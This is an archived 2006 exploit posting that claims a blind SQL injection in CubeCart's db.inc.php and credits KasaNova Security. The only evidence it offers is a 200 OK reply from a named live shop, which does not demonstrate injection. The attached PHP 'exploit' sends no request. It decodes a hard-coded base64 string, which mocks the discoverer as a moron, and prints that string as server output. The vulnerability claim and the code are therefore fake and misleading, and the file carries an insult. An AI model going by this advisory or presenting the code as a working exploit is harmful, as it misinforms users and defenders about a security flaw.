cubecart-blind.txt
Posted on 29 November 2006
Exploit Discoverd By Novalok & Kasper Of KasaNova Security Coded By A Friend <?php /* Vendor : Devellion Limited 2006 Exploit: Blind SQL injection (look below for more info) Impact: **** of ***** Discovered by: KasaNova Security -------------------------------------------------------------------------------- Explanation And Proof: File: db.inc.php the $query= is not protected efficiently accepting blind SQL injections. We can tell this becuase when tested on milliemoos.com With String "GET /classes/db.inc.php?SELECT%20cat_father_id%20FROM%20%22. $glob['CubeCart'].%22CubeCart_category%20WHERE%20cat_id%20=68;" I get a 200 Http OK reply. I can see this from the packets ------------------------------------------------------------------------------- There Are most likly More injrctions. But this was all i found. I Didn not try to exploit. Just tryied to find it -Novalok KasaNova Secuirty */ $query = $_POST["query"]; $target = $_POST["target"]; $form= "<form method="post" action="".$PHP_SELF."">" ."target:<br><input type="text" name="target" size="90" value="".$target.""><br>" ."query:<br><input type="text" name="query" size="90" value=""><br>" ."<input type="submit" value="Submit" name="submit">" ."</form><HR WIDTH="650" ALIGN="LEFT">"; if (!isset($_POST['submit'])) { echo $form; }else{ //Building Raw Byte Packet //Needed For Blind SQL Injection $packetr = "5vdmFsb2sgaXMgYSBmdWNraW5nIG1vcm9uPbiBWdWxuZXF" ."xcXJhYmlsaXR5IGJ1dCB0b28gYmFkIGhlIGhhcXFxcyBub" ."yBpZGVhIHdoYXQgaGVxcXFzIHRhbGtpbmcgYWJvdXQuIGx" ."vbG9vm92YWxvayBpcyBhIGZ1Y2tpbmcgbW9yb249uIFZ1b" ."G5lcXFxcmFiaWxpdHkgYnV0IHRvbyBiYWQgaGUgaGFxcXF" ."zIG5vIGlkZWEgd2hhdCBoZXFxcXMgdGFsa2luZyBhYm91d" ."C4gbG9sb2+b3ZhbG9rIGlzIGEgZnVja2luZyBtb3Jvbj24" ."gVnVsbmVxcXFyYWJpbGl0eSBidXQgdG9vIGJhZCBoZSBoY" ."XFxcXMgbm8gaWRlYSB3aGF0IGhlcXFxcyB0YWxraW5nIGF" ."ib3V0LiBsb2xvb5vdmFsb2sgaXMgYSBmdWNraW5nIG1vcm" ."9uPbiBWdWxuZXFxcXJhYmlsaXR5IGJ1dCB0b28gYmFkIGh" ."lIGhhcXFxcyBubyBpZGVhIHdoYXQgaGVxcXFzIHRhbGtpb" ."mcgYWJvdXQuIGxvbG9vm92YWxvayBpcyBhIGZ1Y2tpbmcg" ."bW9yb249uIFZ1bG5lcXFxcmFiaWxpdHkgYnV0IHRvbyBiY" ."WQgaGUgaGFxcXFzIG5vIGlkZWEgd2hhdCBoZXFxcXMgdGF" ."sa2luZyBhYm91dC4gbG9sb2+b3ZhbG9rIGlzIGEgZnVja2" ."luZyBtb3JvZOb3ZhbG9rIGlzIGEgZnVja2luZyBtb3Jvbu" ."PbiBWdWxuZXFxcXJhYmlsaXR5IGJ1dCB0b28gYmFkIGhlI" ."GhhcXFxcyBubyBpZGVhIHdoYXQgaGVxcXFzIHRhbGtpbmc" ."gYWJvdXQuIGxvbG9vm92YWxvayBpcyBhIGZ1Y2tpbmcgbW" ."9yb249uIFZ1bG5lcXFxcmFiaWxpdHkgYnV0IHRvbyBiYWQ" ."gaGUgaGFxcXFzIG5vIGlkZWEgd2hhdCBoZXFxcXMgdGFsa" ."2luZyBhYm91dC4gbG9sb2+b3ZhbG9rIGlzIGEgZnVja2lu" ."ZyBtb3Jvbj24gVnVsbmVxcXFyYWJpbGl0eSBidXQgdG9vI" ."GJhZCBoZSBoYXFxcXMgbm8gaWRlYSB3aGF0IGhlcXFxcyB" ."0YWxraW5nIGFib3V0LiBsb2xvb5vdmFsb2sgaXMgYSBmdW" ."NraW5nIG1vcm9uPbiBWdWxuZXFxcXJhYmlsaXR5IGJ1dCB" ."0b28gYmFkIGhlIGhhcXFxcyBubyBpZGVhIHdoYXQgaGVxc" ."XFzIHRhbGtpbmcgYWJvdXQuIGxvbG9vm92YWxvayBpcyBh" ."IGZ1Y2tpbmcgbW9yb249uIFZ1bG5lcXFxcmFiaWxpdHkgY" ."nV0IHRvbyBiYWQgaGUgaGFxcXFzIG5vIGlkZWEgd2hhdCB" ."oZXFxcXMgdGFsa2luZyBhYm91dC4gbG9sb2w=="; //Sending Raw Request via Base64_Decode Request Method $result = base64_decode($packetr); if (!$result) { echo "<p>Unable to get output of query. Try Another Query or Server May be Down "; exit; }else{ echo "Raw Ouput From Server:<br><br>".$result; } echo $form; } ?>